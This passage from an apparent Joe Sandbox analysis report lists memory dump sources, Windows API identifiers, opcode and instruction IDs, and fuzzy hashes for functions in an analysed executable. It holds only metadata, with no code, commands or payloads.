                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: Find$FileFirst$CloseErrorLast
                    • String ID:
                    • API String ID: 1464966427-0
                    • Opcode ID: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
                    • Instruction ID: b53f90ff91d3639c293b383453f10217cccd87a810dbd10120280b963a618b7a
                    • Opcode Fuzzy Hash: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
                    • Instruction Fuzzy Hash: 5AF0D16250828281EB10FB74A0023A8B360DB09BB4F541736EA7D073C7CEB8D484C7A6
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                    • Instruction ID: 7d75b2558e818aaea9074527b49714fd36c16f7843404505ea2bf7a6c58e8630
                    • Opcode Fuzzy Hash: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                    • Instruction Fuzzy Hash: 1BF05E11F09A0744FF18FA715C0337892915F44762FC8A632DD6EC62C1DEBCA4808233
                    APIs
                    • FindCloseChangeNotification.KERNELBASE(?,?,00000001,00007FF7E1DC207E), ref: 00007FF7E1DC20F6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: ChangeCloseFindNotification
                    • String ID:
                    • API String ID: 2591292051-0
                    • Opcode ID: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                    • Instruction ID: b76c82a88ef40f0a88a7131b349639d1f9fd92c44a004cbd612311bbf6226e18
                    • Opcode Fuzzy Hash: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                    • Instruction Fuzzy Hash: 14F0C222A0868295FB24DB30E042379A771EB94B78F894336E73D011D8CFB8D895C362
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: File
                    • String ID:
                    • API String ID: 749574446-0
                    • Opcode ID: 182d9e1e92039184aab4081fafd09b1cf385b4bd914a3c272b872952a66d9790
                    • Instruction ID: 9f08bb4b5b3b6d1015975652aa0b013f91aee998ab8fea41ebf61ccce588bc19
                    • Opcode Fuzzy Hash: 182d9e1e92039184aab4081fafd09b1cf385b4bd914a3c272b872952a66d9790
                    • Instruction Fuzzy Hash: EAE08611B1051582EF20FB26C8477245320AF8CF85B841032CE0C07365CF78D4A1CA51
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: FileType
                    • String ID:
                    • API String ID: 3081899298-0
                    • Opcode ID: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                    • Instruction ID: f4f833e972e7ca37306a4646ed5ee30f716e78424486199f2fdf76a701f4b8cd
                    • Opcode Fuzzy Hash: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                    • Instruction Fuzzy Hash: 8BD0C711D09451C3DA10E635985213C93505F95735FE40731D53D815D1CA6D95959262
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: CurrentDirectory
                    • String ID:
                    • API String ID: 1611563598-0
                    • Opcode ID: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
                    • Instruction ID: b01b901965ba8b24c2609a14bb53dd46d2af819782d945cc98c7cce4bea3a5d1
                    • Opcode Fuzzy Hash: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
                    • Instruction Fuzzy Hash: 47C08C21F05503C1DB08AB26C8CA21813A4FB54B04BE08036C10C81120CE3CC5FAA397
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn$CloseErrorFileHandleLastwcscpy$ControlCreateCurrentDeleteDeviceDirectoryProcessRemove
                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                    • API String ID: 2659423929-3508440684
                    • Opcode ID: 133043678a36d966ba880c912d6856c5696a7c6c433e50d223eb52f27bd95b56
                    • Instruction ID: a3483be71d97dc2f5199992e6d622ad3f14e55c2af7120869d1dbf3d773cc58c
                    • Opcode Fuzzy Hash: 133043678a36d966ba880c912d6856c5696a7c6c433e50d223eb52f27bd95b56
                    • Instruction Fuzzy Hash: 3D62D062F0864295FB00EB74D4467ADA361BB857A4FD04233DA6E53AD9DFBCE184C311
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastLoadString$Concurrency::cancel_current_taskInit_thread_footer
                    • String ID: %ls$%s: %s
                    • API String ID: 2539828978-2259941744
                    • Opcode ID: 945c123c5738f6103966ecffbffa27c83b3bf35cf43ea0aac1725ee40d95c140
                    • Instruction ID: ed0d7045d22124574eecbae13b390400b8ba0eeca29e0f5eb1a0d43530016a57
                    • Opcode Fuzzy Hash: 945c123c5738f6103966ecffbffa27c83b3bf35cf43ea0aac1725ee40d95c140
                    • Instruction Fuzzy Hash: BBB28362A1868241EB14EB25E4563FEE311EFCA790F904337E69D43AE6EEBCD540C351
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfomemcpy_s
                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                    • API String ID: 1759834784-2761157908
                    • Opcode ID: c1568b5568d689d261f1f0b975b9c1104ab10acfc5286cd5346a40821ab4f9bc
                    • Instruction ID: 0fb59590822b618e40070394c90e9ecd5dbc05cf66f25e6d42e978e11d2b4b0e
                    • Opcode Fuzzy Hash: c1568b5568d689d261f1f0b975b9c1104ab10acfc5286cd5346a40821ab4f9bc
                    • Instruction Fuzzy Hash: 8DB20872E081828BE725EF69D4417FDB7A1FB48388F905136DA1A57B88CF78E614CB11
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: NamePath$File_invalid_parameter_noinfo_noreturn$LongMoveShort$CompareCreateString
                    • String ID: rtmp
                    • API String ID: 3587137053-870060881
                    • Opcode ID: 3dcc5890c2e22e4a5feb2ae31f1f4ae3f3b67a4ee4a7a529d594af89e49fc87b
                    • Instruction ID: b69671d5476cd470db6dc8b4cb1f469433a26f1ff66bbc98155676ffd1f7a8dc
                    • Opcode Fuzzy Hash: 3dcc5890c2e22e4a5feb2ae31f1f4ae3f3b67a4ee4a7a529d594af89e49fc87b
                    • Instruction Fuzzy Hash: 0BF10523B08A4291EB10EB65D4822FDA771FB953C4F900533EA4E43AA9DFBCD585C791
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                    • String ID:
                    • API String ID: 1693479884-0
                    • Opcode ID: 35b10314ce3b8e4c64707b679fc70269f3b9094245ec8e91ba41ccecbc270bb7
                    • Instruction ID: af5e35d4352fd5f3c6fd3f25a17d869be68171488a3e6e88389c695cab4dafc4
                    • Opcode Fuzzy Hash: 35b10314ce3b8e4c64707b679fc70269f3b9094245ec8e91ba41ccecbc270bb7
                    • Instruction Fuzzy Hash: C3A1B4A2F14B5144FF00EB7998466BDA321AF45BE4B948732DE2D17BC9DEBCD081C251
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                    • String ID:
                    • API String ID: 3140674995-0
                    • Opcode ID: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
                    • Instruction ID: b6685cb08f15d379a47fe606fe3fa631bb26097fa3b1ca0d4385709a560f2605
                    • Opcode Fuzzy Hash: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
                    • Instruction Fuzzy Hash: B0315372608B8199EB64EF60E8513FD73A0FB44744F84443ADA4D87B98DF78D658C711
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                    • String ID:
                    • API String ID: 1239891234-0
                    • Opcode ID: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
                    • Instruction ID: 48b1a0759bc3908d472441c42c0cc043f75d4e51c2c0159f1a708a4f80372e71
                    • Opcode Fuzzy Hash: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
                    • Instruction Fuzzy Hash: ED31A436A08F8195EB64DF25E8413AEB3A0FB88754F904136EA8D83B68DF7CC555CB11
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn
                    • String ID:
                    • API String ID: 3668304517-0
                    • Opcode ID: c264b490cac148f64dd39c131735208f64494c1dc21ecf378d5d3bcbd534f5da
                    • Instruction ID: 38eb4f00193a23d90aabca93e0c351d71a21b35e401da1799107112ea3bb3ad5
                    • Opcode Fuzzy Hash: c264b490cac148f64dd39c131735208f64494c1dc21ecf378d5d3bcbd534f5da
                    • Instruction Fuzzy Hash: 64B1EF62B14686A5EB10FB25E8427EDA361FF897D4F804232EA4E47B99DFBCD540C311
                    APIs
                    • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E1DEFAC4
                      • Part of subcall function 00007FF7E1DE7934: GetCurrentProcess.KERNEL32(00007FF7E1DF0CCD), ref: 00007FF7E1DE7961
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: CurrentProcess_invalid_parameter_noinfo
                    • String ID: *?$.
                    • API String ID: 2518042432-3972193922
                    • Opcode ID: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
                    • Instruction ID: 64b95332aa4a2cd410d792e38b9ccc15225dbeb1386c386633e805aabf1d2490
                    • Opcode Fuzzy Hash: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
                    • Instruction Fuzzy Hash: 2B510762F24B9541EF14EF6198522FDA3A0FB48BD8B948532DE1D47B84DF7CD4428321
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: memcpy_s
                    • String ID:
                    • API String ID: 1502251526-0
                    • Opcode ID: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                    • Instruction ID: 1831381f1accaff4c4eb49b751848b1fde58757a09c4469deeee1716390f947d
                    • Opcode Fuzzy Hash: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                    • Instruction Fuzzy Hash: 55D10332B1828687DB34DF15E1857AAB7A1FB9C784F848135CB5E53B48CA7CEA51CB00
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: ErrorFormatFreeLastLocalMessage
                    • String ID:
                    • API String ID: 1365068426-0
                    • Opcode ID: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
                    • Instruction ID: 33abe30a89dccf16c316186da557f85045db114616fd3d71b21316e116650f2e
                    • Opcode Fuzzy Hash: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
                    • Instruction Fuzzy Hash: 9E01677170C74192EB10EF12B85167AE351FB89BC1F884035DA8E47B49CF7CD5548752
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID:
                    • String ID: .
                    • API String ID: 0-248832578
                    • Opcode ID: 7c9d8364e7b62915daf92aecf888b4814fe01b6aae5fc02ec6e7aa2f3019df5b
                    • Instruction ID: d9715864f4059c1475d314b78758e772d60721804f8a76c2f4b76521154e7592
                    • Opcode Fuzzy Hash: 7c9d8364e7b62915daf92aecf888b4814fe01b6aae5fc02ec6e7aa2f3019df5b
                    • Instruction Fuzzy Hash: 37312A22F1869145E724EA3698067F9AA91EB84FE4F94C236EE6C47BC5CE7CD5018301
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: ExceptionRaise_clrfp
                    • String ID:
                    • API String ID: 15204871-0
